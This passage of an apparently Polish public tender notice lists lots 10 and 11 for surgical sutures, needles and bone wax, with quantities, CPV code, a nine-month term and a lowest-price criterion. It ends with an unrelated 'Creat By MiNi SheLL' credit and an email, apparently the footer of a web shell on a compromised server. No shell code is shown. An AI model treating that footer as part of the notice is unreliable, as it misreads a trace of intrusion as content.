	36

		igła prosta,podwójna/2x51mm/ konwencjonalnie tnąca	35cm	
2.		wosk kostny	

2,5 gr

	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki w cm	Ilość zamawianych saszetek na rok
1	taśma szer.0,3cm	1 igła 1/2 / 85mm/ okrągła, tępa	55-60	12
2	7	1/2 koła /120mm/ odwrotnie tnąca	50-60	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Grubość nici	Igła obwód(+/-5%), rodzaj	Długość nitki w cm	Ilość zamawianych saszetek na rok
1	3/0	1/2 koła/30mm/ okrągła	70-80	36
2	2/0	1/2 koła/30mm/ okrągła	70-80	48
3	1	1/2 koła/37mm/ okrągła	70-80	72
4	2	1/2 koła/40mm/
okrągło- tnąca	70-80	48
5	4/0	2 igły 3/8 koła/25mm/ 
okrągło-tnące	45-75	12
6	4/0	2 igły proste /25mm/ okrągło-tnąca	45-75	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com